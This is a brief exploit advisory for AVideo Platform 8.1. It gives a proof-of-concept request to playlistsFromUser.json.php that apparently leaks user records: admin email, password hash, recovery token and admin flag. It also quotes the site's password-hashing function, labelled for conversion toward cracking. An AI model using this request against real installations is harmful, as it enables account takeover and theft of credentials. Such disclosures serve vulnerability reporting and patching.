Share
# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)  
# Dork: N/A  
# Date: 2020-02-05  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: https://avideo.com  
# Software Link: https://github.com/WWBN/AVideo  
# Version: 8.1  
# Tested on: Linux  
# CVE: N/A  
  
# POC:   
# 1)  
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]  
#   
................  
0   
id 92  
user "admin"  
name "Watch Later"  
email "user@localhost"  
password "bc79a173cc20f0897db1c5b004588db9"  
created "2019-05-16 21:42:42"  
modified "2019-05-16 21:42:42"  
isAdmin 1  
status "watch_later"  
photoURL "videos/userPhoto/photo1.png"  
lastLogin "2020-02-03 08:11:08"  
recoverPass "0ce70c7b006c78552fee993adeaafadf"  
................  
#   
# Hash function to be converted ....  
#   
function encryptPassword($password, $noSalt = false) {  
global $advancedCustom, $global, $advancedCustomUser;  
if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {  
$password .= $global['salt'];  
}  
  
return md5(hash("whirlpool", sha1($password)));  
}  
#